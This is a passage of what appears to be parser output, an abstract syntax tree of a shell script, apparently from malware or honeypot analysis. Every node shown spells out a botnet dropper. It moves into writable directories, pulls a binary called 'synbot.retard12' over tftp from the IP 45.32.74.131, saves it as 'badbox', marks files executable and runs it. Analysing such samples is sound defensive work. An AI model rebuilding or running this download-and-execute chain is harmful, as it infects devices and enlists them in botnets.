      WordNode(lineno=15, pos=(1730, 1736), word='badbox'), pos=(1729, 1736), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1736, 1737)),
  CommandNode(lineno=15, pos=(1737, 1747), parts=[
    WordNode(lineno=15, pos=(1737, 1742), word='chmod'),
    WordNode(lineno=15, pos=(1743, 1745), word='+x'),
    WordNode(lineno=15, pos=(1746, 1747), word='*'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1747, 1748)),
  CommandNode(lineno=15, pos=(1748, 1756), parts=[
    WordNode(lineno=15, pos=(1748, 1756), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1757, 1900), parts=[
  CommandNode(lineno=16, pos=(1757, 1764), parts=[
    WordNode(lineno=16, pos=(1757, 1759), word='cd'),
    WordNode(lineno=16, pos=(1760, 1764), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1765, 1767)),
  CommandNode(lineno=16, pos=(1768, 1779), parts=[
    WordNode(lineno=16, pos=(1768, 1770), word='cd'),
    WordNode(lineno=16, pos=(1771, 1779), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1780, 1782)),
  CommandNode(lineno=16, pos=(1783, 1790), parts=[
    WordNode(lineno=16, pos=(1783, 1785), word='cd'),
    WordNode(lineno=16, pos=(1786, 1790), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1791, 1793)),
  CommandNode(lineno=16, pos=(1794, 1802), parts=[
    WordNode(lineno=16, pos=(1794, 1796), word='cd'),
    WordNode(lineno=16, pos=(1797, 1802), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1803, 1805)),
  CommandNode(lineno=16, pos=(1806, 1810), parts=[
    WordNode(lineno=16, pos=(1806, 1808), word='cd'),
    WordNode(lineno=16, pos=(1809, 1810), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1810, 1811)),
  CommandNode(lineno=16, pos=(1812, 1852), parts=[
    WordNode(lineno=16, pos=(1812, 1816), word='tftp'),
    WordNode(lineno=16, pos=(1817, 1829), word='45.32.74.131'),
    WordNode(lineno=16, pos=(1830, 1832), word='-c'),
    WordNode(lineno=16, pos=(1833, 1836), word='get'),
    WordNode(lineno=16, pos=(1837, 1852), word='synbot.retard12'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1852, 1853)),
  CommandNode(lineno=16, pos=(1853, 1880), parts=[
    WordNode(lineno=16, pos=(1853, 1856), word='cat'),
    WordNode(lineno=16, pos=(1857, 1872), word='synbot.retard12'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1874, 1880), word='badbox'), pos=(1873, 1880), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1880, 1881)),
  CommandNode(lineno=16, pos=(1881, 1891), parts=[
    WordNode(lineno=16, pos=(1881, 1886), word='chmod'),
    WordNode(lineno=16, pos=(1887, 1889), word='+x'),
    WordNode(lineno=16, pos=(1890, 1891), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1891, 1892)),
  CommandNode(lineno=16, pos=(1892, 1900), parts=[
    WordNode(lineno=16, pos=(1892, 1900), word='./badbox'),
  ]),
])
